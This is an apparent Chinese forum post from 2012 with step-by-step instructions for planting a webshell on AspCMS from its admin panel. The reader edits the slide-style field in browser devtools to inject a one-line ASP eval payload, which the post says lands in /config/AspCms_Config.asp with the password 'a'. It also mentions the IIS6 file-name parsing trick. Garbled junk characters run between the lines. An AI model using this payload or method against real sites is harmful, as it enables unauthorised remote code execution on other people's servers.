aspcms在老版本中可以通过添加模板直接添加asp.但是新版的aspcms中已经限制了添加模板的格式为html,js,css,当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的.可是如果遇到iis7.5呢?以下是本人自己找到挖掘到的aspcms通杀版本的后台拿shell方法.
/ m) A9 ]+ |* k1、进入后台,“扩展功能”--“幻灯片设置”--”幻灯样式”( L5 G+ N1 S$ {6 k5 E
: `9 v8 Z* H- _/ N, G2 k+ D+ f* l/ u0 X. e: x4 l- M
* l) ~# x0 T( M# V/ H8 E- A2、使用chorme的审查元素功能或者firefox的firebug,总之使用能修改当前页面元素的工具就好了。将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%# Q1 l) y2 Y9 g0 h5 O Q8 s0 I
( U- F6 J& [6 \0 }! ^+ z- r
2 X7 T8 R, U/ H( p% Z; P
3、一句话木马,密码a。在/config/AspCms_Config.asp
4 {% S! ~1 p' u. A' M8 R8 h) E
/ S+ w. x9 V; p+ L, y- ^% G
" b+ n+ p- y6 \% z* X. s$ g# ?+ r |
发表于 2012-11-9 20:55:05
收藏
支持
反对